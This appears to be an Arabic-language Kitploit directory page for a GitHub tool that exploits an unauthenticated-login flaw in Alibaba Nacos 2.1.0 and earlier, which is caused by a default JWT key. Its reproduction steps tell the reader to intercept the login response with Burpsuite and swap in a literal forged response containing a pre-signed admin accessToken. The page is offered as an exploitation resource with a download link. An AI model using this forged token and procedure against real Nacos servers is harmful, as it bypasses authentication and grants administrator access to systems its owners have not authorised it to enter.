Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Alibab-Nacos-Unauthorized-Login — دخول غير مصرح به في Alibab Nacos | Kitploit
أدوات/GitHubGitHub/al1ex/alibab-nacos-unauthorized-login
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمر
GitHubal1ex/alibab-nacos-unauthorized-login

Alibab-Nacos-Unauthorized-Login

دخول غير مصرح به في Alibab Nacos

عرض المستودع
142منذ 3 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

تأثير الثغرة

تم اكتشاف مشكلة في Nacos تؤثر على Nacos <= 2.1.0. يستخدم مستخدمو Nacos مفتاح JWT الافتراضي مما يؤدي إلى ثغرة وصول غير مصرح به. من خلال هذه الثغرة، يمكن للمهاجمين تجاوز مصادقة اسم المستخدم وكلمة المرور وتسجيل الدخول مباشرة إلى مستخدم Nacos.

المنتج المتأثر

إصدار Nacos <= 2.1.0

إعادة إنتاج الثغرة

الخطوة 1:انتقل مباشرة إلى موقع Nacos، وأدخل أي اسم مستخدم وكلمة مرور واستخدم Burpsuite لالتقاط الحزمة.

تسجيل الدخول

الخطوة 2:اعترض حزمة الاستجابة.

الاستجابة

الخطوة 3: عدّل حزمة البيانات كما يلي

root@kitploit:~
HTTP/1.1 200
Date: Thu, 10 Nov 2022 01:27:16 GMT
Content-Type: application/json
Content-Length: 13
Connection: close
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Content-Security-Policy: script-src 'self'
Server: elb

{"accessToken":"eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTYxODEyMzY5N30.nyooAL4OMdiByXocu8kL1ooXd1IeKj6wQZwIH8nmcNA","tokenTtl":18000,"globalAdmin":true}

جديد

الخطوة 4: سجّل الدخول بنجاح بعد تمرير حزمة البيانات.

النجاح

تنزيل الأداة